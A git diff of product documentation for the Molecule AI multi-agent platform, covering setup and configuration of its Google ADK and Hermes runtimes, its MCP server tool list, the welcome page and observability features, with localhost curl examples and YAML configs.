pip install google-adk
```
<Callout type="warn">
Google ADK requires **Python 3.10+**. Ensure your workspace Dockerfile uses `python:3.11-slim` or newer.
</Callout>
---
## Secrets
The adapter reads your Google credentials from workspace secrets. Set these before starting a Google ADK workspace:
| Secret key | Required | Purpose |
|---|---|---|
| `GOOGLE_API_KEY` | Yes (unless using Vertex AI) | Gemini API key from [Google AI Studio](https://aistudio.google.com/app/apikey) |
| `GOOGLE_CLOUD_PROJECT` | Vertex AI only | GCP project ID |
| `GOOGLE_CLOUD_LOCATION` | Vertex AI only | Region (e.g. `us-central1`) |
| `GOOGLE_GENAI_USE_VERTEXAI` | Vertex AI only | Set to `true` to route via Vertex AI instead of the public API |
Set secrets via the canvas Settings panel or the API:
```bash
curl -X PUT http://localhost:8080/settings/secrets \
-H 'Content-Type: application/json' \
-d '{"key":"GOOGLE_API_KEY","value":"AIza..."}'
```
---
## Quickstart
Once you have set `GOOGLE_API_KEY` (see [Secrets](#secrets) above), these steps take you from zero to a running workspace with a working multi-turn conversation:
```bash
# 1. Create a google-adk workspace
WS=$(curl -s -X POST http://localhost:8080/workspaces \
-H "Content-Type: application/json" \
-d '{
"name": "adk-agent",
"role": "Google ADK inference worker",
"runtime": "google-adk",
"model": "google:gemini-2.0-flash"
}' | jq -r '.id')
echo "Workspace: $WS"
# 2. Wait for ready (~30s)
until curl -s http://localhost:8080/workspaces/$WS \
| jq -r '.status' | grep -q ready; do
echo "Waiting..."; sleep 5
done
# 3. Send your first task
curl -s -X POST http://localhost:8080/workspaces/$WS/a2a \
-H "Content-Type: application/json" \
-d '{
"jsonrpc": "2.0",
"id": "1",
"method": "message/send",
"params": {
"message": {
"role": "user",
"parts": [{"kind": "text", "text": "Summarise the ADK architecture in 3 bullet points."}]
}
}
}' | jq '.result.parts[0].text'
# 4. Multi-turn — session state is preserved across calls
curl -s -X POST http://localhost:8080/workspaces/$WS/a2a \
-H "Content-Type: application/json" \
-d '{
"jsonrpc": "2.0",
"id": "2",
"method": "message/send",
"params": {
"message": {
"role": "user",
"parts": [{"kind": "text", "text": "Now give me a one-line TL;DR of what you just said."}]
}
}
}' | jq '.result.parts[0].text'
# 5. Vertex AI alternative — set these instead of GOOGLE_API_KEY
# curl -X PUT http://localhost:8080/settings/secrets \
# -d '{"key":"GOOGLE_GENAI_USE_VERTEXAI","value":"1"}'
# curl -X PUT http://localhost:8080/settings/secrets \
# -d '{"key":"GOOGLE_CLOUD_PROJECT","value":"my-gcp-project"}'
# curl -X PUT http://localhost:8080/settings/secrets \
# -d '{"key":"GOOGLE_CLOUD_LOCATION","value":"us-central1"}'
```
**How session state works:** the adapter maps each A2A `context_id` to an `InMemorySessionService` session. State is isolated per context and persists across calls within the same session — so the agent in step 4 recalls the answer from step 3 without any orchestrator history management. To persist sessions across workspace restarts, set `session_db_url` in `runtime_config` (see [Configuration reference](#configuration-reference)).
**Model prefix stripping:** the adapter strips the `google:` prefix before passing the model name to ADK — `google:gemini-2.0-flash` becomes `gemini-2.0-flash`. Always use the `google:` prefix in your workspace config; the adapter handles the rest.
---
## Basic usage
### Minimal `config.yaml`
```yaml title="config.yaml"
name: My ADK Agent
runtime: google-adk
model: google:gemini-2.0-flash
role: |
You are a helpful assistant. Answer questions clearly and concisely.
tier: 2
```
### With runtime configuration
```yaml title="config.yaml"
name: Research Agent
runtime: google-adk
model: google:gemini-1.5-pro
role: |
You are a research specialist. Gather and synthesise information from multiple sources.
tier: 2
runtime_config:
max_iterations: 20
enable_code_execution: true
temperature: 0.3
```
### Org template example
```yaml title="org-template/org.yaml"
org_name: Research Team
defaults:
runtime: google-adk
model: google:gemini-2.0-flash
tier: 2
workspaces:
- name: Research Lead
role: Coordinate research tasks and synthesise findings from your team.
children:
- name: Web Researcher
role: Search the web and extract relevant information.
runtime_config:
enable_code_execution: false
- name: Data Analyst
role: Analyse datasets and produce statistical summaries.
runtime_config:
enable_code_execution: true
```
---
## Configuration reference
All options go under `runtime_config:` in `config.yaml`.
| Option | Type | Default | Description |
|---|---|---|---|
| `max_iterations` | integer | `10` | Maximum agent reasoning steps per turn |
| `temperature` | float | `0.0` | Sampling temperature passed to the Gemini model (0.02.0) |
| `enable_code_execution` | boolean | `false` | Allow the agent to execute Python code via ADK's built-in code-execution tool |
| `output_key` | string | `"output"` | Key in the ADK session state that holds the agent's final response |
| `session_db_url` | string | `null` | SQLite or Postgres URL for ADK session persistence across restarts. If null, uses in-memory session storage. |
---
## Tools and plugins
The Google ADK adapter is fully compatible with Molecule AI's plugin system. Plugins installed in a workspace are injected into the ADK agent's tool list via the runtime's plugin registry.
**Supported plugin shapes with Google ADK:**
| Plugin shape | Supported | Notes |
|---|---|---|
| MCP server | Yes | Tools exposed via MCP are wrapped as ADK `FunctionTool` instances |
| Skill files | Yes | Skills are injected into the system prompt |
| Hook scripts | Yes | `PreToolUse` / `PostToolUse` / `UserPromptSubmit` hooks fire normally |
| Slash commands | Yes | Commands are routed through the workspace A2A server as usual |
Example: adding the `superpowers` plugin to a Google ADK workspace:
```yaml title="config.yaml"
runtime: google-adk
model: google:gemini-2.0-flash
plugins:
- superpowers
- molecule-dev
```
---
## A2A communication
Google ADK workspaces participate in the full Molecule AI A2A network — they can receive tasks from parent agents, delegate to children, and send messages to siblings — identically to any other runtime.
The adapter injects the standard A2A MCP tools (`list_peers`, `delegate_task`, `delegate_task_async`, `send_message_to_user`, `commit_memory`, `recall_memory`) into the ADK agent's tool list automatically.
---
## Transcript support
The Google ADK adapter exposes live session transcripts to the canvas "look over shoulder" view. Each agent turn (tool calls, model responses) is streamed as it completes.
---
## Comparison: config.yaml across runtimes
<br />
```yaml title="LangGraph workspace"
runtime: langgraph
model: anthropic:claude-opus-4-7
```
```yaml title="AutoGen workspace"
runtime: autogen
model: openai:gpt-4o
```
```yaml title="Google ADK workspace"
runtime: google-adk
model: google:gemini-2.0-flash
runtime_config:
temperature: 0.1
```
The `model` field follows `<provider>:<model-id>` format. For Google ADK, the `google:` prefix routes through the `google-genai` LangChain integration.
---
## Troubleshooting
### `google.api_core.exceptions.InvalidArgument: 400 API key not valid`
Your `GOOGLE_API_KEY` secret is missing or invalid. Check it in the canvas Settings panel and verify it in [Google AI Studio](https://aistudio.google.com/app/apikey).
### `RuntimeError: google-adk is not installed`
The workspace image is missing the `google-adk` Python package. If you are using a custom image, ensure `requirements.txt` includes `google-adk>=1.0.0` and rebuild the image.
### Agent returns empty response after tool calls
Check `max_iterations` in `runtime_config`. If the agent hits the iteration cap mid-task, it returns the last partial result. Increase `max_iterations` or break the task into smaller sub-tasks via A2A delegation.
### Vertex AI 403 Permission Denied
Ensure `GOOGLE_CLOUD_PROJECT`, `GOOGLE_CLOUD_LOCATION`, and `GOOGLE_GENAI_USE_VERTEXAI=true` are all set, and that your service account has the `roles/aiplatform.user` IAM role on the project.
---
## See also
- [Architecture — Workspace Runtime](/docs/architecture#workspace-runtime) — how adapters fit into the runtime
- [Concepts — Workspaces](/docs/concepts#workspaces) — workspace primitives
- [Org Template](/docs/org-template) — deploy a full team from a YAML definition
- [Plugins](/docs/plugins) — extend your ADK agents with hooks, skills, and MCP servers
- [Google ADK Python on GitHub](https://github.com/google/adk-python) — upstream documentation

View File

@ -1,3 +1,6 @@
---
title: "Guides"
---
# Guides
Step-by-step guides for common Molecule AI integrations and configurations.

View File

@ -1,3 +1,6 @@
---
title: "Skill Catalog"
---
# Skill Catalog
Skills extend what a workspace agent can do — from browser automation

345
content/docs/hermes.mdx Normal file
View File

@ -0,0 +1,345 @@
---
title: Hermes Runtime & Multi-Provider Dispatch
description: Hermes is Molecule AI's built-in inference router. Route tasks to Anthropic, Gemini, or any OpenAI-compatible model through native dispatch paths — with correct multi-turn history on all three.
---
import { Callout } from 'fumadocs-ui/components/callout';
# Hermes Runtime & Multi-Provider Dispatch
Hermes is Molecule AI's built-in inference router powering `runtime: hermes` workspaces. It supports three dispatch paths — a native Anthropic Messages API path, a native Gemini `generateContent` path, and an OpenAI-compatible shim for 13+ other providers — keyed automatically by which API secret is present on the workspace.
Phases 2a through 2e are fully merged to `main`:
- **Phase 2a** (PR #240) — native Anthropic dispatch
- **Phase 2b** (PR #255) — native Gemini dispatch with correct `role: "model"` + `parts` wire format
- **Phase 2c** (PR #267) — correct multi-turn history preserved as turns (not flattened) on all three paths
- **Phase 2d** (PR #499) — stacked system messages (`system_blocks` kwarg) on Anthropic and Gemini paths
- **Phase 2e** (PRs #644, #645) — native `tools=[]` parameter + `response_format=json_schema` structured output on Anthropic native path
<Callout type="info">
**Remaining roadmap:** vision content blocks and streaming on native paths are scoped for a future release.
</Callout>
---
## Dispatch table
Hermes selects an inference path based on which API key is set on the workspace. Keys are resolved in priority order:
> `HERMES_API_KEY` → `OPENROUTER_API_KEY` → `ANTHROPIC_API_KEY` → `GEMINI_API_KEY`
The first key found wins. Don't set `HERMES_API_KEY` if you want native Anthropic or Gemini dispatch — it takes priority and routes through the OpenAI-compat shim.
| Key present | Dispatch path | Provider | Wire format |
|---|---|---|---|
| `ANTHROPIC_API_KEY` | Native Anthropic | Anthropic | Messages API — `{role, content}` |
| `GEMINI_API_KEY` | Native Gemini | Google | `generateContent` — `{role: "model", parts: [{text}]}` |
| `OPENROUTER_API_KEY` / `HERMES_API_KEY` / other | OpenAI-compat shim | 13+ providers | OpenAI Chat Completions |
| None | Error | — | — |
**Fail-loud semantics:** if `ANTHROPIC_API_KEY` is set but the `anthropic` Python package is not installed in the workspace image, Hermes raises a `RuntimeError` immediately — before any inference attempt. Same for `google-genai`. Silent fallback to the compat shim would mask format errors; Hermes fails loudly instead.
---
## Secrets
Set provider keys as global or workspace-level secrets:
```bash
# Native Anthropic dispatch
curl -X PUT http://localhost:8080/settings/secrets \
-H "Content-Type: application/json" \
-d '{"key":"ANTHROPIC_API_KEY","value":"sk-ant-..."}'
# Native Gemini dispatch
curl -X PUT http://localhost:8080/settings/secrets \
-H "Content-Type: application/json" \
-d '{"key":"GEMINI_API_KEY","value":"YOUR-GEMINI-KEY"}'
# OpenAI-compat shim (OpenRouter, Groq, Mistral, etc.)
curl -X PUT http://localhost:8080/settings/secrets \
-H "Content-Type: application/json" \
-d '{"key":"OPENROUTER_API_KEY","value":"sk-or-..."}'
```
To force a specific workspace to use Gemini dispatch when a global `ANTHROPIC_API_KEY` is set, clear the key at the workspace level:
```bash
curl -X PUT http://localhost:8080/workspaces/$GEMINI_WS/secrets \
-H "Content-Type: application/json" \
-d '{"key":"ANTHROPIC_API_KEY","value":""}'
```
---
## Quickstart
### Native Anthropic dispatch
```bash
export MOLECULE_API=http://localhost:8080
# 1. Store your Anthropic key
curl -s -X PUT $MOLECULE_API/settings/secrets \
-H "Content-Type: application/json" \
-d '{"key":"ANTHROPIC_API_KEY","value":"sk-ant-YOUR-KEY"}' | jq .
# 2. Create a Hermes workspace
ANTHROPIC_WS=$(curl -s -X POST $MOLECULE_API/workspaces \
-H "Content-Type: application/json" \
-d '{
"name": "hermes-anthropic",
"role": "Inference worker — native Anthropic path",
"runtime": "hermes",
"model": "anthropic:claude-sonnet-4-5"
}' | jq -r '.id')
# 3. Wait for ready
until curl -s $MOLECULE_API/workspaces/$ANTHROPIC_WS \
| jq -r '.status' | grep -q ready; do sleep 5; done
# 4. Confirm dispatch path
curl -s -X POST $MOLECULE_API/workspaces/$ANTHROPIC_WS/a2a \
-H "Content-Type: application/json" \
-d '{
"jsonrpc":"2.0","id":"probe-1","method":"message/send",
"params":{"message":{"role":"user","parts":[{"kind":"text",
"text":"Which provider API are you calling to generate this response?"}]}}
}' | jq '.result.parts[0].text'
# Expected: confirms Anthropic Messages API — no OpenAI-compat translation layer
```
### Native Gemini dispatch
```bash
# 1. Store your Gemini key
curl -s -X PUT $MOLECULE_API/settings/secrets \
-H "Content-Type: application/json" \
-d '{"key":"GEMINI_API_KEY","value":"YOUR-GEMINI-KEY"}' | jq .
# 2. Create a Gemini workspace
GEMINI_WS=$(curl -s -X POST $MOLECULE_API/workspaces \
-H "Content-Type: application/json" \
-d '{
"name": "hermes-gemini",
"role": "Inference worker — native Gemini path",
"runtime": "hermes",
"model": "gemini:gemini-2.0-flash"
}' | jq -r '.id')
# 3. Wait for ready
until curl -s $MOLECULE_API/workspaces/$GEMINI_WS \
| jq -r '.status' | grep -q ready; do sleep 5; done
# 4. Confirm dispatch path
curl -s -X POST $MOLECULE_API/workspaces/$GEMINI_WS/a2a \
-H "Content-Type: application/json" \
-d '{
"jsonrpc":"2.0","id":"probe-2","method":"message/send",
"params":{"message":{"role":"user","parts":[{"kind":"text",
"text":"Which provider API are you calling?"}]}}
}' | jq '.result.parts[0].text'
# Expected: confirms Google generateContent — role: "model" + parts[] wrapper used correctly
```
### Multi-turn history (Phase 2c)
```bash
# Turn 1
curl -s -X POST $MOLECULE_API/workspaces/$ANTHROPIC_WS/a2a \
-H "Content-Type: application/json" \
-d '{
"jsonrpc":"2.0","id":"turn-1","method":"message/send",
"params":{"message":{"role":"user","parts":[{"kind":"text",
"text":"My name is Alice. Remember that."}]}}
}' | jq '.result.parts[0].text'
# Turn 2 — history is threaded as turns, not flattened into a single blob
curl -s -X POST $MOLECULE_API/workspaces/$ANTHROPIC_WS/a2a \
-H "Content-Type: application/json" \
-d '{
"jsonrpc":"2.0","id":"turn-2","method":"message/send",
"params":{"message":{"role":"user","parts":[{"kind":"text",
"text":"What is my name?"}]}}
}' | jq '.result.parts[0].text'
# Expected: "Alice" — role attribution is preserved across turns
```
Before Phase 2c, multi-turn history was flattened into a single user blob. The model could often recover context from the text but lost clean role attribution, which caused failures on structured prompts. Phase 2c passes turns as turns: OpenAI and Anthropic use `{role, content}`; Gemini uses `{role: "model", parts: [{text}]}`.
---
## Multi-provider teams
An orchestrator can fan tasks to Anthropic and Gemini workers simultaneously, each routed through its native path — no application-level provider switching required:
```bash
# Fan out — both workers fire via delegate_task_async
curl -s -X POST $MOLECULE_API/workspaces/$ORCH_ID/a2a \
-H "Content-Type: application/json" \
-d "{
\"jsonrpc\":\"2.0\",\"id\":\"fan-1\",\"method\":\"message/send\",
\"params\":{\"message\":{\"role\":\"user\",\"parts\":[{\"kind\":\"text\",
\"text\":\"delegate_task_async $ANTHROPIC_WS 'Draft release notes for v2.1' AND delegate_task_async $GEMINI_WS 'Summarise the last 30 days of support tickets'\"}]}}
}" | jq .
```
Both workers receive correctly formatted messages through their native paths. No LiteLLM proxy layer. No format translation overhead on every request.
---
## Advanced: stacked system messages
[NousResearch Hermes 4](https://hermes4.nousresearch.com) works best when persona, tool context, and reasoning policy are sent as **separate** `{"role": "system"}` entries rather than one concatenated string. `HermesA2AExecutor` supports this via the `system_blocks` kwarg (PR #499).
### Usage
```python
from workspace_template.executors.hermes_a2a_executor import HermesA2AExecutor
executor = HermesA2AExecutor(
system_blocks=[
"You are a senior security auditor. Be terse and precise.", # persona
"You have access to bash, file search, and grep tools.", # tools context
"Think step-by-step before concluding. Cite evidence.", # reasoning policy
]
)
```
The executor emits each non-empty, non-`None` block as a separate `{"role": "system"}` message in the recommended order: **persona → tools context → reasoning policy**.
### Behaviour
| Condition | Result |
|-----------|--------|
| `system_blocks` is set | Emits one `{"role": "system"}` per non-empty block; `system_prompt` is ignored |
| Entry is `None` or `""` | Silently skipped |
| All entries empty | Zero system messages emitted |
| `system_blocks` not set (`None`) | Falls back to the legacy `system_prompt` path — **fully backward-compatible** |
### Backward compatibility
Callers that pass a single `system_prompt` string are **unaffected**:
```python
# Legacy path — still works, no changes required
executor = HermesA2AExecutor(
system_prompt="You are a security auditor. Think step-by-step."
)
```
Only set `system_blocks` when you want fine-grained control over block ordering or need to inject tool manifests into a dedicated block.
---
## Native tools parameter (Phase 2e — PR #644)
Hermes now passes tool definitions to the model via the native `tools=[]` API parameter instead of injecting them as text in the prompt. This applies to the **Anthropic native dispatch path** and produces structured tool call/result blocks that the Nous/Hermes-3 tool call format handles correctly.
```python
executor = HermesA2AExecutor(
tools=[
{
"name": "bash",
"description": "Run a bash command and return stdout/stderr.",
"input_schema": {
"type": "object",
"properties": {
"command": {"type": "string", "description": "The shell command to run"}
},
"required": ["command"]
}
}
]
)
```
The OpenAI-compat shim path also accepts `tools=[]` but continues to inject them as text-in-prompt for compatibility with OpenRouter-routed models that don't natively support tool calls.
## Structured output — `response_format` (Phase 2e — PR #645)
`response_format=json_schema` is wired through to the Anthropic native dispatch path. Pass a JSON Schema definition to request strictly-typed JSON output from the model:
```python
executor = HermesA2AExecutor(
response_format={
"type": "json_schema",
"json_schema": {
"name": "audit_finding",
"schema": {
"type": "object",
"properties": {
"severity": {"type": "string", "enum": ["critical", "high", "medium", "low"]},
"description": {"type": "string"},
"remediation": {"type": "string"}
},
"required": ["severity", "description", "remediation"]
}
}
}
)
```
The model's completion will always be valid JSON matching the schema. The Gemini native and OpenAI-compat shim paths do not yet support `response_format` — it is silently ignored on those paths.
---
## Capability table
### Shipped (Phases 2a2e — all merged to main)
| Capability | OpenAI-compat shim | Anthropic native | Gemini native |
|---|---|---|---|
| Plain text, single-turn | ✅ | ✅ | ✅ |
| Multi-turn history | ⚠️ flattened into one user blob | ✅ role-attributed turns | ✅ `role: "model"` + `parts` wrapper |
| Correct Gemini wire format | ❌ wrong role, missing parts | — | ✅ |
| No compat-shim translation overhead | ❌ every request translated | ✅ | ✅ |
| Stacked system messages (`system_blocks`) | ❌ | ✅ | ✅ |
| Native `tools=[]` parameter | ⚠️ text-in-prompt injection | ✅ PR #644 | 📋 roadmap |
| Structured output (`response_format=json_schema`) | ❌ | ✅ PR #645 | 📋 roadmap |
### Roadmap (future release)
| Capability | Anthropic native | Gemini native |
|---|---|---|
| Vision content blocks | 📋 | 📋 |
| Streaming | 📋 | 📋 |
| Native tools on Gemini path | — | 📋 |
| Structured output on Gemini path | — | 📋 |
---
## Troubleshooting
### `RuntimeError: anthropic is not installed`
The `anthropic` Python package is missing from the workspace image. Add `anthropic` to `requirements.txt` in your custom image and rebuild, or use the standard `molecule-ai-workspace-template-hermes` image.
### Gemini workspace getting Anthropic dispatch instead
A global `ANTHROPIC_API_KEY` is taking priority. Clear it at the workspace level:
```bash
curl -X PUT $MOLECULE_API/workspaces/$GEMINI_WS/secrets \
-d '{"key":"ANTHROPIC_API_KEY","value":""}'
```
### Multi-turn context lost between calls
Each workspace maintains its own history buffer. Ensure you are sending all turns of a conversation to the same workspace. A2A `context_id` scopes history within the workspace.
### OpenAI-compat shim returns garbled Gemini output
If you are routing a Gemini model through a key that triggers the compat shim (e.g. `OPENROUTER_API_KEY`), you will see the old role/format translation issues. Switch to `GEMINI_API_KEY` for native dispatch.
---
## See also
- [Concepts — Workspaces](/docs/concepts#workspaces)
- [API Reference — POST /workspaces](/docs/api-reference#post-workspaces)
- [Google ADK Runtime](/docs/google-adk) — Gemini-native alternative to Hermes for ADK-first workflows
- PR #240: [Phase 2a — native Anthropic dispatch](https://github.com/Molecule-AI/molecule-core/pull/240)
- PR #255: [Phase 2b — native Gemini dispatch](https://github.com/Molecule-AI/molecule-core/pull/255)
- PR #267: [Phase 2c — multi-turn history on all paths](https://github.com/Molecule-AI/molecule-core/pull/267)
- Issue [#513](https://github.com/Molecule-AI/molecule-core/issues/513)

View File

@ -1,3 +1,6 @@
---
title: "Incident Log — molecule-core"
---
# Incident Log — molecule-core
> This file documents security incidents, outages, and degraded states.

83
content/docs/index.mdx Normal file
View File

@ -0,0 +1,83 @@
---
title: Welcome to Molecule AI
description: Multi-agent organisations as code — templates, plugins, channels, and the runtime that ties them together.
---
Molecule AI is an open platform for building, running, and operating
multi-agent organisations. You define your team in one YAML file
(`org.yaml`), pick the plugins each role needs, wire up the channels they
talk on, schedule their recurring work — and the platform takes care of the
rest.
## Try it now
| | |
|---|---|
| **Dashboard** | [app.moleculesai.app](https://app.moleculesai.app) — create orgs, deploy agents |
| **API** | [api.moleculesai.app](https://api.moleculesai.app) — control plane REST API |
| **Documentation** | [doc.moleculesai.app](https://doc.moleculesai.app) — you are here |
| **Status** | [status.moleculesai.app](https://status.moleculesai.app) — uptime monitoring |
| **Self-host** | [Self-Hosting Guide](/docs/self-hosting) — run on your own infrastructure |
## What you can build
- **Self-running engineering teams** — PM, Dev Lead, frontend / backend / devops
agents, security auditor, QA — all coordinating through A2A messages and
scheduled audits, opening real PRs to your real repo.
- **Research squads** — market analysts, technical researchers, competitive
intelligence agents that sweep the web on a cadence and write findings to
shared memory.
- **Product orgs** — anything you can describe as a tree of roles and
responsibilities.
- **Hybrid teams** — mix cloud-hosted agents with [external agents](/docs/external-agents)
running on your own infrastructure, edge devices, or other clouds.
## How it works
1. **Templates.** Describe your org as a YAML tree of workspaces. Each workspace
is a real container running an LLM agent. Templates ship with sensible
defaults so you can spin one up in one command.
2. **Plugins.** Add capabilities to one role or all of them — guardrails,
skills, slash commands, browser automation, MCP servers. Plugins compose;
per-role overrides UNION with the defaults.
3. **Channels.** Connect any role to [Telegram, Slack, or Lark/Feishu](/docs/channels)
so users can talk to agents directly from their existing tools.
4. **Schedules.** Define [recurring work](/docs/schedules) in cron syntax. The
runtime fires the prompt at the scheduled time, supervised against panics
with a liveness watchdog.
5. **Tokens.** Generate [API tokens](/docs/tokens) per workspace for secure
authentication. Rotate, revoke, and audit from the dashboard or API.
6. **The canvas.** A live visualisation of your org — every workspace as a
node, every A2A message as an edge, every memory write tracked in real time.
## Eight runtime adapters
| Runtime | Description |
|---------|-------------|
| Claude Code | Anthropic Claude with code execution |
| LangGraph | LangChain ReAct agent with tools |
| OpenClaw | Multi-file prompt system with SOUL |
| CrewAI | Role-based agent with task delegation |
| AutoGen | Microsoft conversable agents |
| DeepAgents | Deep research with planning |
| Hermes | NousResearch Hermes-3 multi-provider |
| Gemini CLI | Google Gemini CLI workspace |
## Integrate with everything
- **[MCP Server](/docs/mcp-server)** — 87 tools for managing Molecule AI from any
MCP-compatible AI agent (Claude Code, Cursor, etc.)
- **[Python SDK](https://pypi.org/project/molecule-ai-sdk)** — `pip install molecule-ai-sdk`
- **[External Agents](/docs/external-agents)** — register any HTTP agent as a
first-class workspace
## Where to next
- New here? Read the [Quickstart](/docs/quickstart) — spin up your first
agent in under five minutes.
- Want the architecture tour? Start with [Concepts](/docs/concepts) and
[Architecture](/docs/architecture).
- Ready to build your own org? Jump to [Org Templates](/docs/org-template).
- Want to connect your own agent? See [External Agents](/docs/external-agents).
- Need API access? Check [Token Management](/docs/tokens) and the
[API Reference](/docs/api-reference).

View File

@ -1,3 +1,6 @@
---
title: "Molecule AI + opencode Integration"
---
# Molecule AI + opencode Integration
> **opencode** is an AI coding agent ([opencode.ai](https://opencode.ai)) that supports remote MCP servers via `opencode.json`. This guide shows how to wire it to your Molecule AI workspace.

162
content/docs/mcp-server.mdx Normal file
View File

@ -0,0 +1,162 @@
---
title: MCP Server
description: Manage Molecule AI workspaces from any MCP-compatible AI agent using 87 tools.
---
The Molecule AI MCP server lets any MCP-compatible AI agent (Claude Code,
Cursor, etc.) manage workspaces, agents, secrets, memory, schedules,
channels, and more through the platform API.
## Quick start
### Install
```bash
npx @molecule-ai/mcp-server@1.0.0
```
### Configure in `.mcp.json`
```json
{
"mcpServers": {
"molecule": {
"type": "stdio",
"command": "npx",
"args": ["@molecule-ai/mcp-server@1.0.0"],
"env": {
"MOLECULE_URL": "http://localhost:8080"
}
}
}
}
```
<Callout type="warn">
**Pin the package version.** The examples above use `@1.0.0` — always specify an exact version and omit the `-y` flag. An unpinned `npx -y @molecule-ai/mcp-server` (no version) silently installs whatever npm serves on the next restart; if the package is ever compromised, it runs with your full MCP client permissions. Check [npm](https://www.npmjs.com/package/@molecule-ai/mcp-server) for the latest stable release before upgrading.
</Callout>
For SaaS deployments, set `MOLECULE_URL` to your tenant URL:
```json
"MOLECULE_URL": "https://your-org.moleculesai.app"
```
### Verify
Once configured, your MCP client should show 87 Molecule AI tools. Test with:
```
list_workspaces
```
## Tool categories
The MCP server exposes tools across these categories:
### Workspace management
| Tool | API Route | Description |
|---|---|---|
| `list_workspaces` | `GET /workspaces` | List all workspaces |
| `create_workspace` | `POST /workspaces` | Create a new workspace |
| `get_workspace` | `GET /workspaces/:id` | Get workspace details |
| `update_workspace` | `PATCH /workspaces/:id` | Update workspace fields |
| `delete_workspace` | `DELETE /workspaces/:id` | Delete a workspace |
| `restart_workspace` | `POST /workspaces/:id/restart` | Restart container |
| `pause_workspace` | `POST /workspaces/:id/pause` | Pause workspace |
| `resume_workspace` | `POST /workspaces/:id/resume` | Resume paused workspace |
### Communication
| Tool | API Route | Description |
|---|---|---|
| `chat_with_agent` | `POST /workspaces/:id/a2a` | Send A2A message |
| `async_delegate` | `POST /workspaces/:id/delegate` | Fire-and-forget delegation |
| `check_delegations` | `GET /workspaces/:id/delegations` | Check delegation status |
| `list_peers` | `GET /registry/:id/peers` | Find peer workspaces |
| `notify_user` | `POST /workspaces/:id/notify` | Push notification to canvas |
### Configuration and secrets
| Tool | API Route | Description |
|---|---|---|
| `get_config` | `GET /workspaces/:id/config` | Get config.yaml |
| `update_config` | `PATCH /workspaces/:id/config` | Update config |
| `list_secrets` | `GET /workspaces/:id/secrets` | List secret keys |
| `set_secret` | `POST /workspaces/:id/secrets` | Set a secret |
| `set_global_secret` | `PUT /settings/secrets` | Set a global secret |
### Memory
| Tool | API Route | Description |
|---|---|---|
| `memory_list` | `GET /workspaces/:id/memory` | List memory keys |
| `memory_get` | `GET /workspaces/:id/memory/:key` | Get value |
| `memory_set` | `POST /workspaces/:id/memory` | Set key-value |
| `search_memory` | `GET /workspaces/:id/memories` | Full-text search |
### Files
| Tool | API Route | Description |
|---|---|---|
| `list_files` | `GET /workspaces/:id/files` | List workspace files |
| `read_file` | `GET /workspaces/:id/files/*path` | Read file content |
| `write_file` | `PUT /workspaces/:id/files/*path` | Write file |
| `replace_all_files` | `PUT /workspaces/:id/files` | Replace all files |
### Schedules
| Tool | API Route | Description |
|---|---|---|
| `list_schedules` | `GET /workspaces/:id/schedules` | List cron schedules |
| `create_schedule` | `POST /workspaces/:id/schedules` | Create schedule |
| `run_schedule` | `POST /workspaces/:id/schedules/:id/run` | Trigger now |
### Channels
| Tool | API Route | Description |
|---|---|---|
| `list_channels` | `GET /workspaces/:id/channels` | List channels |
| `add_channel` | `POST /workspaces/:id/channels` | Add Telegram/Slack/Lark |
| `test_channel` | `POST /workspaces/:id/channels/:id/test` | Test connectivity |
| `send_channel_message` | `POST /workspaces/:id/channels/:id/send` | Send message |
### Plugins
| Tool | API Route | Description |
|---|---|---|
| `list_installed_plugins` | `GET /workspaces/:id/plugins` | List installed |
| `install_plugin` | `POST /workspaces/:id/plugins` | Install from source |
| `uninstall_plugin` | `DELETE /workspaces/:id/plugins/:name` | Uninstall |
### Tokens
| Tool | API Route | Description |
|---|---|---|
| `list_tokens` | `GET /workspaces/:id/tokens` | List workspace tokens |
| `create_token` | `POST /workspaces/:id/tokens` | Create bearer token |
| `revoke_token` | `DELETE /workspaces/:id/tokens/:id` | Revoke token |
### Templates and bundles
| Tool | API Route | Description |
|---|---|---|
| `list_templates` | `GET /templates` | Available templates |
| `import_org` | `POST /org/import` | Import org template |
| `export_bundle` | `GET /bundles/export/:id` | Export workspace |
| `import_bundle` | `POST /bundles/import` | Import workspace |
## Environment variables
| Variable | Default | Description |
|---|---|---|
| `MOLECULE_URL` | `http://localhost:8080` | Platform API URL |
## Troubleshooting
| Issue | Fix |
|---|---|
| Connection refused | Check `MOLECULE_URL` points to running platform |
| 401 Unauthorized | Token expired or revoked — create a new one |
| Tools not showing | Run `npx @molecule-ai/mcp-server@1.0.0` standalone to check errors |

32
content/docs/meta.json Normal file
View File

@ -0,0 +1,32 @@
{
"title": "Documentation",
"pages": [
"index",
"changelog",
"quickstart",
"concepts",
"workspace-config",
"architecture",
"org-template",
"plugins",
"channels",
"schedules",
"external-agents",
"tokens",
"api-reference",
"mcp-server",
"self-hosting",
"self-hosting/admin-token",
"observability",
"troubleshooting",
"---Security---",
"security/index",
"security/safe-mcp-advisory",
"security/owasp-agentic-top-10",
"---Runtimes---",
"google-adk",
"hermes",
"---Integrations---",
"opencode"
]
}

View File

@ -0,0 +1,180 @@
---
title: Observability
description: Monitor agent activity, LLM traces, and platform health.
---
## Overview
Molecule AI provides multiple layers of observability -- from real-time WebSocket events on the canvas to structured activity logs, LLM traces, Prometheus metrics, and admin health endpoints.
## Activity Logs
Every significant action in the platform is recorded in the `activity_logs` table. Query logs for a specific workspace:
```
GET /workspaces/:id/activity
```
Activity types include:
- **A2A communications** -- request/response capture with duration and method
- **Task updates** -- agent-reported task status changes
- **Agent logs** -- structured log entries from workspace runtimes
- **Errors** -- failures with `error_detail` for debugging
Filter by source to separate user-agent chat (`source=canvas`) from agent-to-agent traffic (`source=agent`).
Activity logs are automatically cleaned up based on `ACTIVITY_RETENTION_DAYS` (default 7). The cleanup job runs every `ACTIVITY_CLEANUP_INTERVAL_HOURS` (default 6).
## LLM Traces
Molecule AI integrates with [Langfuse](https://langfuse.com) for LLM observability. Langfuse runs as part of the infrastructure stack on port 3001, backed by ClickHouse for efficient trace storage.
View traces for a specific workspace:
```
GET /workspaces/:id/traces
```
The Langfuse UI at `http://localhost:3001` provides:
- Token usage and cost tracking per workspace
- Latency breakdowns for LLM calls
- Prompt/completion pairs for debugging
- Trace timelines showing multi-step agent reasoning
## Prometheus Metrics
The platform exposes Prometheus-format metrics at:
```
GET /metrics
```
This endpoint requires no authentication and is safe to scrape. Metrics are in Prometheus text format (v0.0.4) and include:
- Request counts by method, path, and status code
- Request latency histograms
- Active WebSocket connections
- Workspace status counts
Configure your Prometheus instance to scrape `http://localhost:8080/metrics` at your preferred interval.
## Per-Workspace Token Metrics
